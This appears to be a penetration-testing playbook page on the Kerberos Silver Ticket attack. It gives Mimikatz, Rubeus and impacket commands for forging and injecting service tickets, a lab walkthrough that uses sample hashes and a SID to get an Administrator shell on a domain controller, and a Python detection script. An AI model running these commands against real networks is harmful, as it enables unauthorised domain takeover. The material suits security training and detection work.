# Silver Ticket


## Silver Ticket

In a Silver Ticket attack, we forge the TGS (service ticket) to gain access to a service without needing to compromise a domain controller.

* We first compromise a service account by obtaining its NTLM hash or Kerberos key.
* Forge the TGS using Mimikatz.
* Use the forged TGS to authenticate to the specific service as the compromised account.
* Unlike a Golden Ticket, which uses a forged TGT, a Silver Ticket does not require any interaction with the DC, making it **stealthier**.
* Note: a Golden Ticket provides access to any service on any machine, whereas a Silver Ticket only provides access to a particular service on a particular machine. A Golden Ticket could last 6 months, whereas a Silver Ticket expires in 30 days.

### Windows:

{% code overflow="wrap" %}

```powershell
# Create the ticket (/rc4 takes the NTLM hash of the service account obtained in the first step)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket into the current session (either tool works)
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell on the target using the injected ticket
.\PsExec.exe -accepteula \\<TARGET> cmd
```

{% endcode %}

### Linux:

{% code overflow="wrap" %}

```bash
# Forge the service ticket for the given SPN and write it as <USER>.ccache
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

# Point the Kerberos credential cache at the forged ticket
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache

# Authenticate with the cached ticket instead of a password
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```

{% endcode %}

### Attack in Practice:

When we have the DC/DA hash, we can create a Silver Ticket that grants access to a service on the DC. Once the ticket is imported, we can get a shell on the DC.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"># ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import the ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

# A similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more.

# Since the ticket is imported, we can get a shell on the DC and execute commands.
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
</code></pre>
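The flip side of the "no DC interaction" property above is how a Silver Ticket is spotted: the service host records a Kerberos network logon (event 4624, logon type 3) that no DC ever issued a service ticket for (event 4769). The script below is an added detection example, not part of this playbook; it correlates constructed sample events from a host and from the DCs, using assumed SIEM-normalised field names rather than raw Windows XML, and defaults the look-back window to the 600-minute default service ticket lifetime (the same value the `/endin:600` flag above mimics).

```python
"""Silver Ticket detection heuristic: a forged TGS produces a Kerberos logon on the
service host (4624, logon type 3) with no matching ticket issuance (4769) on any DC."""
from datetime import datetime, timedelta

ISO = "%Y-%m-%dT%H:%M:%S"

def _norm_service(service_name: str) -> str:
    # 4769 records the service account (e.g. DCORP-DC$); strip '$' to compare with host names
    return service_name.rstrip("$").lower()

def find_unbacked_kerberos_logons(host_events, dc_events, window_minutes=600):
    """Return (user, host, time) for each Kerberos network logon on the host that has
    no 4769 for the same user and target service account in the preceding window.
    The default window equals the default 600-minute maximum service ticket lifetime."""
    window = timedelta(minutes=window_minutes)
    issued = [
        (datetime.strptime(e["time"], ISO), e["user"].lower(), _norm_service(e["service"]))
        for e in dc_events if e["id"] == 4769
    ]
    suspicious = []
    for e in host_events:
        if e["id"] != 4624 or e["logon_type"] != 3 or e["auth"] != "Kerberos":
            continue  # only Kerberos network logons can originate from a forged TGS
        t = datetime.strptime(e["time"], ISO)
        user, host = e["user"].lower(), e["host"].lower()
        backed = any(u == user and svc == host and t - window <= issued_at <= t
                     for issued_at, u, svc in issued)
        if not backed:
            suspicious.append((e["user"], e["host"], e["time"]))
    return suspicious

# Constructed sample events (not taken from the page); host name follows the dcorp-dc lab above.
DC_EVENTS = [  # 4769 is only ever written on the DC that issued the ticket
    {"id": 4769, "time": "2024-05-01T09:58:10", "user": "jdoe", "service": "DCORP-DC$"},
]
HOST_EVENTS = [  # 4624 is written on the service host itself
    {"id": 4624, "time": "2024-05-01T10:00:07", "user": "jdoe", "logon_type": 3,
     "auth": "Kerberos", "host": "dcorp-dc"},
    {"id": 4624, "time": "2024-05-01T10:20:00", "user": "Administrator", "logon_type": 3,
     "auth": "Kerberos", "host": "dcorp-dc"},
    {"id": 4624, "time": "2024-05-01T10:30:00", "user": "svc_backup", "logon_type": 3,
     "auth": "NTLM", "host": "dcorp-dc"},
]

if __name__ == "__main__":
    for user, host, when in find_unbacked_kerberos_logons(HOST_EVENTS, DC_EVENTS):
        print(f"no DC issued a ticket for {user} -> {host} before the logon at {when}")
```

The check only works when 4769 events from every DC in the domain are collected centrally; a DC whose logs are not forwarded is the main source of false positives.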

